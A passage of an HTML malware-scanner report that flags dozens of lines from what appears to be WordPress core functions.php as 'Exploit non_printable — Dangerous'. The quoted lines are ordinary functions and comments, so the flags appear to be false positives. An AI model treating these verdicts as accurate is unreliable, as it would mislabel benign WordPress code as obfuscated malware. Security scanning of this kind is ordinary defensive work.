</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__return_zero</span><span style="color: #007700">() { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.FunctionDoubleUnderscore</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6984</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning an </span><span style="color: #007700">empty array </span><span style="color: #0000BB">to filters easily</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6988</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array Empty array.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6990</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__return_empty_array</span><span style="color: #007700">() { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.FunctionDoubleUnderscore</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns null</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning null to filters easily</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">null Null value</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7003</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_null</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7004</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">null</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7008</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returning an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string to filters easily</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string </span><span style="color: #007700">Empty </span><span style="color: #0000BB">string</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__return_empty_string</span><span style="color: #007700">() { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.FunctionDoubleUnderscore,PHPCompatibility.FunctionNameRestrictions.ReservedFunctionNames.FunctionDoubleUnderscore</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7030</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send_nosniff_header</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7035</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a MySQL expression </span><span style="color: #007700">for </span><span style="color: #0000BB">selecting the week number based on the start_of_week option</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string SQL clause</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_wp_mysql_week</span><span style="color: #007700">( </span><span style="color: #0000BB">$column </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7047</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WEEK( </span><span style="color: #0000BB">$column</span><span style="color: #DD0000">, 1 )"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7053</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WEEK( DATE_SUB( </span><span style="color: #0000BB">$column</span><span style="color: #DD0000">, INTERVAL </span><span style="color: #0000BB">$start_of_week</span><span style="color: #DD0000"> DAY ), 0 )"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WEEK( </span><span style="color: #0000BB">$column</span><span style="color: #DD0000">, 0 )"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that maps object IDs to parent IDs</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7066</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that accepts </span><span style="color: #007700">( </span><span style="color: #0000BB">ID</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback_args </span><span style="color: #007700">) and </span><span style="color: #0000BB">outputs parent_ID</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7071</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array </span><span style="color: #0000BB">IDs of all members of loop</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7073</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_find_hierarchy_loop</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$start</span><span style="color: #007700">, </span><span style="color: #0000BB">$start_parent</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback_args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7081</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_find_hierarchy_loop_tortoise_hare</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$arbitrary_loop_member</span><span style="color: #007700">, </span><span style="color: #0000BB">$override</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback_args</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that accepts </span><span style="color: #007700">( </span><span style="color: #0000BB">ID</span><span style="color: #007700">, </span><span style="color: #0000BB">callback_arg</span><span style="color: #007700">, ... ) and </span><span style="color: #0000BB">outputs parent_ID</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_loop</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">array </span><span style="color: #0000BB">might </span><span style="color: #007700">include </span><span style="color: #0000BB">branches</span><span style="color: #007700">). Default </span><span style="color: #0000BB">false</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7101</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">mixed Scalar ID of some arbitrary member of the loop</span><span style="color: #007700">, or array </span><span style="color: #0000BB">of IDs of all members of loop </span><span style="color: #007700">if</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7104</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_find_hierarchy_loop_tortoise_hare</span><span style="color: #007700">( </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$start</span><span style="color: #007700">, </span><span style="color: #0000BB">$override </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$callback_args </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$_return_loop </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = array();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7118</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_loop </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return[ </span><span style="color: #0000BB">$tortoise </span><span style="color: #007700">] = </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return[ </span><span style="color: #0000BB">$evanescent_hare </span><span style="color: #007700">] = </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return[ </span><span style="color: #0000BB">$hare </span><span style="color: #007700">] = </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$_return_loop </span><span style="color: #007700">? </span><span style="color: #0000BB">$return </span><span style="color: #007700">: </span><span style="color: #0000BB">$tortoise</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7143</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send_frame_options_header</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">was moved from </span><span style="color: #007700">`</span><span style="color: #DD0000">wp-admin/includes/misc.php</span><span style="color: #007700">` </span><span style="color: #0000BB">to </span><span style="color: #007700">`</span><span style="color: #DD0000">wp-includes/functions.php</span><span style="color: #007700">`.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_admin_headers</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">[] Array </span><span style="color: #0000BB">of allowed protocols</span><span style="color: #007700">. </span><span style="color: #0000BB">Defaults to an </span><span style="color: #007700">array </span><span style="color: #0000BB">containing </span><span style="color: #DD0000">'http'</span><span style="color: #007700">, </span><span style="color: #DD0000">'https'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7189</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_allowed_protocols</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7207</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$protocols</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7211</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns a comma</span><span style="color: #007700">-</span><span style="color: #0000BB">separated string </span><span style="color: #007700">or array </span><span style="color: #0000BB">of functions that have been called to get</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7218</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">calls within </span><span style="color: #007700">- </span><span style="color: #0000BB">useful</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7223</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned</span><span style="color: #007700">. Default </span><span style="color: #0000BB">true</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array </span><span style="color: #0000BB">Either a string containing a reversed comma separated trace </span><span style="color: #007700">or </span><span style="color: #0000BB">an </span><span style="color: #007700">array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7227</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_debug_backtrace_summary</span><span style="color: #007700">( </span><span style="color: #0000BB">$ignore_class </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">, </span><span style="color: #0000BB">$skip_frames </span><span style="color: #007700">= </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pretty </span><span style="color: #007700">= </span><span style="color: #0000BB">true </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 724</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (bool) </span><span style="color: #0000BB">preg_match</span><span style="color: #007700">( </span><span style="color: #DD0000">"/^</span><span style="color: #007700">{</span><span style="color: #0000BB">$token</span><span style="color: #007700">}</span><span style="color: #DD0000">:[0-9]+:/s"</span><span style="color: #007700">, </span><span style="color: #0000BB">$data </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">']}";</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'], array( '</span><span style="color: #0000BB">do_action</span><span style="color: #DD0000">', '</span><span style="color: #0000BB">apply_filters</span><span style="color: #DD0000">', '</span><span style="color: #0000BB">do_action_ref_array</span><span style="color: #DD0000">', '</span><span style="color: #0000BB">apply_filters_ref_array</span><span style="color: #DD0000">' ), true ) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7253</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">']}('</span><span style="color: #007700">{</span><span style="color: #0000BB">$call</span><span style="color: #007700">[</span><span style="color: #DD0000">'args'</span><span style="color: #007700">][</span><span style="color: #0000BB">0</span><span style="color: #007700">]}</span><span style="color: #DD0000">')";</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function</span><span style="color: #DD0000">'], array( '</span><span style="color: #007700">include</span><span style="color: #DD0000">', '</span><span style="color: #007700">include_once</span><span style="color: #DD0000">', '</span><span style="color: #007700">require</span><span style="color: #DD0000">', '</span><span style="color: #007700">require_once</span><span style="color: #DD0000">' ), true ) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 7256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
